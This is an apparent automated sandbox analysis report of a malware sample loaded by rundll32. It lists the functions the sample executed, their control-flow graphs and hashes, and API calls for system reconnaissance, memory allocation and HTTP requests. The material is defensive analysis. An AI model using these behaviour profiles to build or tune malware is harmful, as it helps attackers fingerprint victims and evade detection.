54558->54502 54559->54504 54560->54506 54561->54508 54562->54510 54563->54512 54564->54514 54565->54516 54566->54518 54567->54520 54568->54522 54569->54524 54570->54526 54571->54528 54572->54532 54573->54534 54574->54536 54575->54538 54576->54540 54579 7ff8a8d96716 54577->54579 54578 7ff8a8d9671b LeaveCriticalSection 54579->54578 54582 7ff8a8d967c4 LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 54579->54582 54582->54579 54583 1ceafca4be0 54585 1ceafca4c02 54583->54585 54584 1ceafca4c5e 54585->54584 54586 1ceafca4c5c NtProtectVirtualMemory 54585->54586 54586->54584 54587 1ceafca3f40 54589 1ceafca3f69 54587->54589 54588 1ceafca3fc9 54589->54588 54590 1ceafca3fc7 NtAllocateVirtualMemory 54589->54590 54590->54588 54591 7ff8a8d5b1d0 54600 7ff8a8d96880 54591->54600 54595 7ff8a8d5b233 54611 7ff8a8d58888 54595->54611 54602 7ff8a8d9688b 54600->54602 54601 7ff8a8d5b21b 54604 7ff8a8d581a8 54601->54604 54602->54601 54603 7ff8a8ddba40 _Getctype 2 API calls 54602->54603 54603->54602 54615 7ff8a8d58344 54604->54615 54606 7ff8a8d58209 54607 7ff8a8d58344 26 API calls 54606->54607 54608 7ff8a8d582a2 54607->54608 54609 7ff8a8d58344 26 API calls 54608->54609 54610 7ff8a8d5830b 54609->54610 54610->54595 54627 7ff8a8d58ca0 54611->54627 54614 7ff8a8d57b30 26 API calls std::_Deallocate 54616 7ff8a8d58369 54615->54616 54617 7ff8a8d58401 54616->54617 54618 7ff8a8d583e2 54616->54618 54620 7ff8a8d583f3 54616->54620 54623 7ff8a8d58463 54616->54623 54619 7ff8a8d96880 std::locale::_Locimp::_New_Locimp 2 API calls 54617->54619 54621 7ff8a8d583eb 54618->54621 54618->54623 54619->54620 54620->54606 54622 7ff8a8d96880 std::locale::_Locimp::_New_Locimp 2 API calls 54621->54622 54622->54620 54624 7ff8a8d5848c 54623->54624 54626 7ff8a8d00920 26 API calls _invalid_parameter_noinfo_noreturn 54623->54626 54624->54606 54628 7ff8a8d58cbe 54627->54628 54631 7ff8a8d59004 54628->54631 54632 7ff8a8d96880 std::locale::_Locimp::_New_Locimp 2 API calls 54631->54632 54633 7ff8a8d5903a 54632->54633 54634 7ff8a8d581a8 26 API calls 54633->54634 54636 7ff8a8d5904a 54634->54636 54635 7ff8a8d5889b 54635->54614 54636->54635 54638 7ff8a8d592b0 26 API calls 54636->54638 54638->54636

                                                                    Executed Functions

                                                                    Function 000001CEAFC94D00 Relevance: 10.8, APIs: 7, Instructions: 282COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 73 1ceafc94d00-1ceafc94daf GetUserNameW GetComputerNameExW 74 1ceafc94dc7-1ceafc94df1 GetComputerNameExW call 1ceafca4ad0 73->74 75 1ceafc94db1-1ceafc94dc1 call 1ceafc9b4c0 73->75 80 1ceafc94e58-1ceafc94e92 call 1ceafca2750 call 1ceafc8dfc0 74->80 81 1ceafc94df3-1ceafc94e1a GetTokenInformation 74->81 75->74 95 1ceafc94eaa-1ceafc94ed1 GetNativeSystemInfo 80->95 96 1ceafc94e94-1ceafc94ea5 call 1ceafca3de0 80->96 82 1ceafc94e1c-1ceafc94e28 81->82 83 1ceafc94e4e-1ceafc94e53 call 1ceafca4000 81->83 86 1ceafc94e2a-1ceafc94e39 call 1ceafca3de0 82->86 87 1ceafc94e3e-1ceafc94e49 call 1ceafca3de0 82->87 83->80 86->87 87->83 98 1ceafc94ee8-1ceafc94eec 95->98 99 1ceafc94ed3-1ceafc94ee6 95->99 96->95 101 1ceafc94f17-1ceafc94f2d call 1ceafca3de0 98->101 102 1ceafc94eee-1ceafc94efd 98->102 100 1ceafc94f01-1ceafc94f15 call 1ceafca3de0 99->100 106 1ceafc94f32-1ceafc94f42 100->106 101->106 102->100 108 1ceafc94f89-1ceafc94fb9 GetAdaptersInfo 106->108 109 1ceafc94f44-1ceafc94f84 call 1ceafca3b90 call 1ceafca3de0 call 1ceafca3b90 * 2 106->109 113 1ceafc94fbb-1ceafc94fdc call 1ceafc9b4e0 * 2 108->113 114 1ceafc94fdd-1ceafc94fe3 108->114 109->108 114->113 117 1ceafc94fe5-1ceafc94ffd call 1ceafc9b4c0 GetAdaptersInfo 114->117 117->113 127 1ceafc94fff-1ceafc9500c 117->127 128 1ceafc95012-1ceafc95015 127->128 128->113 129 1ceafc95017-1ceafc95018 128->129 130 1ceafc9501f-1ceafc95031 call 1ceafc793e0 129->130 133 1ceafc95033-1ceafc95043 call 1ceafca3de0 130->133 134 1ceafc95045-1ceafc9504c 130->134 133->130 134->113 136 1ceafc95052-1ceafc95062 call 1ceafca3de0 134->136 136->128
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4536861192.000001CEAFC71000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001CEAFC71000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_1ceafc71000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: InfoName$AdaptersComputer$InformationNativeSystemTokenUser
                                                                    • String ID:
                                                                    • API String ID: 1596153048-0
                                                                    • Opcode ID: d50f4ad2efba3391476b1df615d2eec79fdb99fb842461ae2565caf3412d5556
                                                                    • Instruction ID: b6cf34b8dbe0ae60a7c5d5f7c6fb1b1c84cb62a4ad0cc5af0a9ed7933d4c9509
                                                                    • Opcode Fuzzy Hash: d50f4ad2efba3391476b1df615d2eec79fdb99fb842461ae2565caf3412d5556
                                                                    • Instruction Fuzzy Hash: 1DA1C630218B089FFB54AB15D895BDEB3E6FB94340F40852DE44AC32D1DB75EA45CB86
                                                                    Function 00007DF4A9FC0100 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 214COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000003.2332935897.00007DF4A9FC0000.00000020.00001000.00020000.00000000.sdmp, Offset: 00007DF4A9FC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_3_7df4a9fc0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: CreateSnapshotToolhelp32
                                                                    • String ID: @
                                                                    • API String ID: 3332741929-2766056989
                                                                    • Opcode ID: 4dd753c87e2aa29c9c96ae48a87dd40f0169a1ec6aa8ae238ef9ae283b3ca07b
                                                                    • Instruction ID: da1c0afb37d120cce94b48c8fe429dcf1c081946eedeca419ac758cd331161c9
                                                                    • Opcode Fuzzy Hash: 4dd753c87e2aa29c9c96ae48a87dd40f0169a1ec6aa8ae238ef9ae283b3ca07b
                                                                    • Instruction Fuzzy Hash: BE71D031614A4C8FEF94EF6CC858BA977E1FB98315F104226E81ED72A0EB749955CB80
                                                                    Function 00007DF4A9FC0000 Relevance: 6.1, APIs: 4, Instructions: 88processCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000003.2332935897.00007DF4A9FC0000.00000020.00001000.00020000.00000000.sdmp, Offset: 00007DF4A9FC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_3_7df4a9fc0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: CloseCreateFirstHandleProcess32SnapshotToolhelp32
                                                                    • String ID:
                                                                    • API String ID: 1083639309-0
                                                                    • Opcode ID: 7b76749183c32904e7c867cae929a431087f8f66ce00ca14fd6eade76c102862
                                                                    • Instruction ID: d22a1f8c8b266c6c1b8788c2b24742c58840f44bf7b1f1512376acd60c68d718
                                                                    • Opcode Fuzzy Hash: 7b76749183c32904e7c867cae929a431087f8f66ce00ca14fd6eade76c102862
                                                                    • Instruction Fuzzy Hash: 0A21E13065494C8FEFA1EB6CCD58BEA33E1FB98314F404226D41EDB290EE35DA458750
                                                                    Function 000001CEAFC71600 Relevance: 1.7, APIs: 1, Instructions: 169threadCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4536861192.000001CEAFC71000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001CEAFC71000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_1ceafc71000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: ExitThreadUser
                                                                    • String ID:
                                                                    • API String ID: 3424019298-0
                                                                    • Opcode ID: 5153d8f8c97089589795ae645a7e47378385fa85047d0636f0422ff5950f5102
                                                                    • Instruction ID: fbc4066b2f4b451035279cec02928eab07ba6c19267b2fe7ffb4b7ee20c4904a
                                                                    • Opcode Fuzzy Hash: 5153d8f8c97089589795ae645a7e47378385fa85047d0636f0422ff5950f5102
                                                                    • Instruction Fuzzy Hash: 9551F274148A085FF748EF29D855BF9B7E1FB46350F100259E49BC32E2DA39E802CB85
                                                                    Function 000001CEAFC7CCE0 Relevance: 1.6, APIs: 1, Instructions: 114libraryloaderCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4536861192.000001CEAFC71000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001CEAFC71000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_1ceafc71000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: AddressProcedure
                                                                    • String ID:
                                                                    • API String ID: 3653107232-0
                                                                    • Opcode ID: 64a4c363e66e8fcb324c2d013a85a570e217f1f41a485886b1e3891cf8e103dc
                                                                    • Instruction ID: dd81d052d65e91575b807fdfc07f45366e11c6627d8a023665eaabf2a1adf37a
                                                                    • Opcode Fuzzy Hash: 64a4c363e66e8fcb324c2d013a85a570e217f1f41a485886b1e3891cf8e103dc
                                                                    • Instruction Fuzzy Hash: 3931A33165CB085FE768AF09DC46BFAB7E0FB95350F50061EE586C3291D620E84587CA
                                                                    Function 00007FF8A8CF9A80 Relevance: 1.5, APIs: 1, Instructions: 13COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    • Associated: 00000003.00000002.4538037574.00007FF8A8CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538390729.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538576796.00007FF8A8E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538663993.00007FF8A8EA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538723630.00007FF8A8EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538794066.00007FF8A8EE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538892968.00007FF8A8EE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538973313.00007FF8A8EED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4539028330.00007FF8A8EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: InfoSystem
                                                                    • String ID:
                                                                    • API String ID: 31276548-0
                                                                    • Opcode ID: 3b9193fbf2ab34594eed76214b4d4e304845222aad74228beea63719356c42be
                                                                    • Instruction ID: e558cecce3160fd316934fc8d21d8cf4a7efcc9ca70bf34b0d2296e82cd1a381
                                                                    • Opcode Fuzzy Hash: 3b9193fbf2ab34594eed76214b4d4e304845222aad74228beea63719356c42be
                                                                    • Instruction Fuzzy Hash: B0E0EC35A19A81D6EA10EB10E86202AB3B0FB89784F810035E68D42B15DFBCE525CB14
                                                                    Function 000001CEAFC717B0 Relevance: .4, Instructions: 355COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 357 1ceafc717b0-1ceafc717f1 358 1ceafc717f5-1ceafc71800 357->358 359 1ceafc71802-1ceafc7180d 358->359 360 1ceafc7184b-1ceafc71879 call 1ceafca1270 call 1ceafc9b4c0 * 2 358->360 359->358 361 1ceafc7180f-1ceafc71846 call 1ceafc9b4e0 * 2 359->361 360->359 373 1ceafc7187b-1ceafc7187e 360->373 372 1ceafc71b05-1ceafc71b09 361->372 374 1ceafc71b13-1ceafc71b29 372->374 375 1ceafc71b0b-1ceafc71b0e call 1ceafc9b4e0 372->375 373->359 376 1ceafc71880-1ceafc7189f 373->376 380 1ceafc71b4f-1ceafc71b5f 374->380 381 1ceafc71b2b-1ceafc71b4a call 1ceafca3b80 call 1ceafc7a050 call 1ceafc9b4e0 374->381 375->374 378 1ceafc718a1-1ceafc718a3 376->378 382 1ceafc718a5-1ceafc718b9 378->382 383 1ceafc718e4-1ceafc718f1 call 1ceafca1270 378->383 380->372 393 1ceafc71b61-1ceafc71b71 380->393 381->380 382->378 385 1ceafc718bb-1ceafc718be 382->385 383->359 394 1ceafc718f7-1ceafc7191c 383->394 388 1ceafc718c0-1ceafc718c5 385->388 388->383 392 1ceafc718c7-1ceafc718e2 388->392 392->388 396 1ceafc71920-1ceafc71935 call 1ceafc7a130 394->396 400 1ceafc71aec-1ceafc71afa 396->400 401 1ceafc7193b-1ceafc71940 396->401 400->396 404 1ceafc71b00 400->404 402 1ceafc71a3c-1ceafc71a88 call 1ceafca4070 call 1ceafc74cd0 401->402 403 1ceafc71946-1ceafc71955 401->403 402->400 415 1ceafc71a8a-1ceafc71a9e 402->415 405 1ceafc7195d-1ceafc7196d 403->405 406 1ceafc71957 403->406 404->359 411 1ceafc71973-1ceafc71976 405->411 406->405 413 1ceafc71988-1ceafc71a17 call 1ceafca4070 call 1ceafca4000 411->413 414 1ceafc71978-1ceafc71986 411->414 432 1ceafc71a1c-1ceafc71a37 413->432 414->411 414->413 419 1ceafc71ab0-1ceafc71ac5 415->419 420 1ceafc71aa0-1ceafc71aa7 call 1ceafca4000 415->420 419->415 425 1ceafc71ac7-1ceafc71ae4 call 1ceafca4000 * 2 419->425 424 1ceafc71aac-1ceafc71aae 420->424 424->400 425->400 432->400
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4536861192.000001CEAFC71000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001CEAFC71000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_1ceafc71000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: c3a27eaabef9b11607e5348644df54255de6d118b201e6426a1c13144a620278
                                                                    • Instruction ID: 84baaf2e9af7adc6055d8f533623fc8378c05d63569cc28c9334eefac1e44ae3
                                                                    • Opcode Fuzzy Hash: c3a27eaabef9b11607e5348644df54255de6d118b201e6426a1c13144a620278
                                                                    • Instruction Fuzzy Hash: 22C10230158A499FFB54EF29C885BEAB7E1FF59380F500269E48AC32E2EB70D941C745
                                                                    Function 000001CEAFCA4360 Relevance: .1, Instructions: 138COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4536861192.000001CEAFC71000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001CEAFC71000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_1ceafc71000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 246b04183441d9db0d4c236240df2ca26f18e78107733016fa740d2a375581b5
                                                                    • Instruction ID: 38fd14a913e8f20fcf089d403b48c49011da93193835ed048e1d463ee9c6400f
                                                                    • Opcode Fuzzy Hash: 246b04183441d9db0d4c236240df2ca26f18e78107733016fa740d2a375581b5
                                                                    • Instruction Fuzzy Hash: F8414CB151CB489FE7B49F09A8427EAB7E0FB89720F00492FD5C983255D731A8428BC7
                                                                    Function 000001CEAFCA3F40 Relevance: .1, Instructions: 75COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4536861192.000001CEAFC71000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001CEAFC71000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_1ceafc71000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 38f81910f3a60e41c97a405c41efcb50c28e990bd7599c8c7593531c701bee66
                                                                    • Instruction ID: 8f69c6546609b2713b71275fb20531048540caae3453b326ab516dd85ae80b12
                                                                    • Opcode Fuzzy Hash: 38f81910f3a60e41c97a405c41efcb50c28e990bd7599c8c7593531c701bee66
                                                                    • Instruction Fuzzy Hash: 6011E43061C7449FF754EB199856BEAB7E0FB98360F00080FE488C3290D635E48087C7
                                                                    Function 000001CEAFCA4BE0 Relevance: .1, Instructions: 71COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4536861192.000001CEAFC71000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001CEAFC71000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_1ceafc71000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 4459b4d784854b5074084b1eb2e58009c50c2c7bf0fd286647bf740f6eacac18
                                                                    • Instruction ID: 999746ad037729750501b7c681d490006c2eb5d8cd0a0c6dad977dfd3f02c54e
                                                                    • Opcode Fuzzy Hash: 4459b4d784854b5074084b1eb2e58009c50c2c7bf0fd286647bf740f6eacac18
                                                                    • Instruction Fuzzy Hash: 6711B230698B499FEA64AF499846BA977D4FB48355F40041FE449C32A0D775E8808B87
                                                                    Function 000001CEAFC87A50 Relevance: .1, Instructions: 69COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4536861192.000001CEAFC71000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001CEAFC71000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_1ceafc71000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 5bb11d53fe8240a521e5f77f5ce288efeffd0a38eebd87c38d9030f26bb6a810
                                                                    • Instruction ID: 95bf43611179cef61131dbd47b3983b20909c3b7bed51b8518ba04d9cd68fe16
                                                                    • Opcode Fuzzy Hash: 5bb11d53fe8240a521e5f77f5ce288efeffd0a38eebd87c38d9030f26bb6a810
                                                                    • Instruction Fuzzy Hash: 69110170198B486FF7609B198846BFEB2C0FBC8794F51051DE889C32C1EBB5D6489687
                                                                    Function 000001CEAFCA4FF0 Relevance: .1, Instructions: 68COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4536861192.000001CEAFC71000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001CEAFC71000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_1ceafc71000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: a3b493b046dda1831e3ac93b31f1d57d2ffdedc147415695421c0937c946fff3
                                                                    • Instruction ID: 083b632e69f904c3879a0e6518538775405604e50d97a9787fb32e6f5df00242
                                                                    • Opcode Fuzzy Hash: a3b493b046dda1831e3ac93b31f1d57d2ffdedc147415695421c0937c946fff3
                                                                    • Instruction Fuzzy Hash: 9C11C170658B489FFA14AF099846BEAB7E0FB48351F40481EE489C32D1D675E880CA87
                                                                    Function 000001CEAFCA4740 Relevance: .1, Instructions: 61COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4536861192.000001CEAFC71000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001CEAFC71000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_1ceafc71000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: c6c2dce99591ed636752d02e92fb4e83679b8b4534c19c070d62bd12e62a70ad
                                                                    • Instruction ID: 99a956d982f21c7b71af008f5df2278868b3d881b5e1854d94f61dec01cc921a
                                                                    • Opcode Fuzzy Hash: c6c2dce99591ed636752d02e92fb4e83679b8b4534c19c070d62bd12e62a70ad
                                                                    • Instruction Fuzzy Hash: 1E01D630668B459FF758BB199403BFA73E2FB89750F10451EE44AC32E1E635E9408A87
                                                                    Function 000001CEAFE2D2B6 Relevance: .0, Instructions: 43COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000003.2086199598.000001CEAFDF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CEAFDF0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_3_1ceafdf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 4f8c2193cd15d56b920b71f0a62798233d7bc621eaf68b72cfb2e802f18a24de
                                                                    • Instruction ID: 2c4058ad4a9bee647a122248115fa153e3cc2a072a918afc96306b6c7163fdf8
                                                                    • Opcode Fuzzy Hash: 4f8c2193cd15d56b920b71f0a62798233d7bc621eaf68b72cfb2e802f18a24de
                                                                    • Instruction Fuzzy Hash: DFF0F470618B408BE744DF1884C963977E1FBD8715F20452EE889C7361DB31D842CB43
                                                                    Function 000001CEAFE2D326 Relevance: .0, Instructions: 37COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000003.2086199598.000001CEAFDF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CEAFDF0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_3_1ceafdf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 744c819c75b2bbda755093bb73dffba834d27d1bf64d68f532f853bd1298e79c
                                                                    • Instruction ID: bed783c3cd4b49d6b0145169a464da223b9bc738d895059aef7ce690730b9b4d
                                                                    • Opcode Fuzzy Hash: 744c819c75b2bbda755093bb73dffba834d27d1bf64d68f532f853bd1298e79c
                                                                    • Instruction Fuzzy Hash: 8FF0B470A24F044BDB04AF2C888AA7973D1F7A8715F54452EA448C3361DB35E4428B43
                                                                    Function 000001CEAFC88149 Relevance: .0, Instructions: 20COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4536861192.000001CEAFC71000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001CEAFC71000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_1ceafc71000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 3a87759f1dbb7da0b31a2215c550786eb7d616866bd4ea5bb0906d9c5e547a0c
                                                                    • Instruction ID: 6ef95555bfa7b2532c61f2d4397e975e4ab043e296a925e432865ce87495b2e5
                                                                    • Opcode Fuzzy Hash: 3a87759f1dbb7da0b31a2215c550786eb7d616866bd4ea5bb0906d9c5e547a0c
                                                                    • Instruction Fuzzy Hash: 7AD0A77248DB184DE7209B98F8437E8B3D0F780324F40482EC18CC2043D63F90564706
                                                                    Function 000001CEAFC77830 Relevance: 10.8, APIs: 7, Instructions: 340networkmemoryCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 0 1ceafc77830-1ceafc77883 1 1ceafc77885-1ceafc77888 0->1 2 1ceafc7788a-1ceafc77892 InternetOpenW 0->2 1->2 3 1ceafc77af9-1ceafc77afd 2->3 4 1ceafc77898-1ceafc778d7 InternetConnectW 2->4 5 1ceafc77aff-1ceafc77b0c 3->5 4->3 6 1ceafc778dd-1ceafc7792b HttpOpenRequestW 4->6 7 1ceafc77b0e-1ceafc77b11 InternetCloseHandle 5->7 8 1ceafc77b17-1ceafc77b1a 5->8 6->5 9 1ceafc77931-1ceafc7793b 6->9 7->8 10 1ceafc77b25-1ceafc77b28 8->10 11 1ceafc77b1c-1ceafc77b1d 8->11 12 1ceafc77990-1ceafc779ab 9->12 13 1ceafc7793d-1ceafc77945 9->13 14 1ceafc77b33-1ceafc77b3b 10->14 15 1ceafc77b2a-1ceafc77b2b 10->15 11->10 12->5 24 1ceafc779b1-1ceafc779ba 12->24 13->12 16 1ceafc77947-1ceafc7798b call 1ceafca2750 * 2 13->16 18 1ceafc77b41-1ceafc77b4b 14->18 19 1ceafc77bd0-1ceafc77be3 14->19 15->14 16->12 22 1ceafc77b62-1ceafc77b73 18->22 23 1ceafc77b4d-1ceafc77b54 call 1ceafca1230 18->23 26 1ceafc77b75-1ceafc77b78 22->26 27 1ceafc77b7a-1ceafc77b8a call 1ceafc7cb60 22->27 23->22 36 1ceafc77b56-1ceafc77b60 call 1ceafc9b4e0 23->36 28 1ceafc779bc-1ceafc779de call 1ceafca1270 HttpSendRequestA 24->28 29 1ceafc779e6-1ceafc77a0a 24->29 26->19 26->27 43 1ceafc77b8c-1ceafc77bb8 call 1ceafc7a050 call 1ceafc9b4e0 27->43 44 1ceafc77bba-1ceafc77bce call 1ceafca1410 27->44 28->5 42 1ceafc779e4-1ceafc77a16 28->42 39 1ceafc77a0c 29->39 36->19 39->28 50 1ceafc77a24-1ceafc77a3b call 1ceafc9b4c0 42->50 51 1ceafc77a18-1ceafc77a1f call 1ceafc9b4e0 42->51 43->19 44->19 44->36 58 1ceafc77a3f-1ceafc77a5b InternetQueryDataAvailable 50->58 51->50 59 1ceafc77ae3-1ceafc77af7 call 1ceafc9b4e0 58->59 60 1ceafc77a61-1ceafc77a69 58->60 59->7 60->59 62 1ceafc77a6b-1ceafc77a7e 60->62 62->59 65 1ceafc77a80-1ceafc77a86 62->65 65->59 66 1ceafc77a88-1ceafc77a96 65->66 67 1ceafc77aac-1ceafc77aaf call 1ceafc9b4c0 66->67 68 1ceafc77a98-1ceafc77aaa RtlReAllocateHeap 66->68 69 1ceafc77ab4-1ceafc77ade call 1ceafc944a0 67->69 68->69 69->58
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4536861192.000001CEAFC71000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001CEAFC71000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_1ceafc71000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: Internet$HeapHttpOpenRequest$AllocateAvailableCloseConnectDataFreeHandleQuerySend
                                                                    • String ID:
                                                                    • API String ID: 3737532752-0
                                                                    • Opcode ID: d9666d6ee9cc84210a5d48bfb43a1b93f204f5f1cab97c350c418fdf5ba67fc7
                                                                    • Instruction ID: 71fd8c2df091d8ef0b767aaa01534618b0b3951d557167aa36d88480abfed1a2
                                                                    • Opcode Fuzzy Hash: d9666d6ee9cc84210a5d48bfb43a1b93f204f5f1cab97c350c418fdf5ba67fc7
                                                                    • Instruction Fuzzy Hash: 84B1E230618A099FFB54EF19D859BEEB7E5FF98380F044569A84AC32D1DF74D8018786
                                                                    Function 00007FF8A8D02D25 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 24COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    • Associated: 00000003.00000002.4538037574.00007FF8A8CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538390729.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538576796.00007FF8A8E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538663993.00007FF8A8EA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538723630.00007FF8A8EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538794066.00007FF8A8EE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538892968.00007FF8A8EE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538973313.00007FF8A8EED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4539028330.00007FF8A8EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
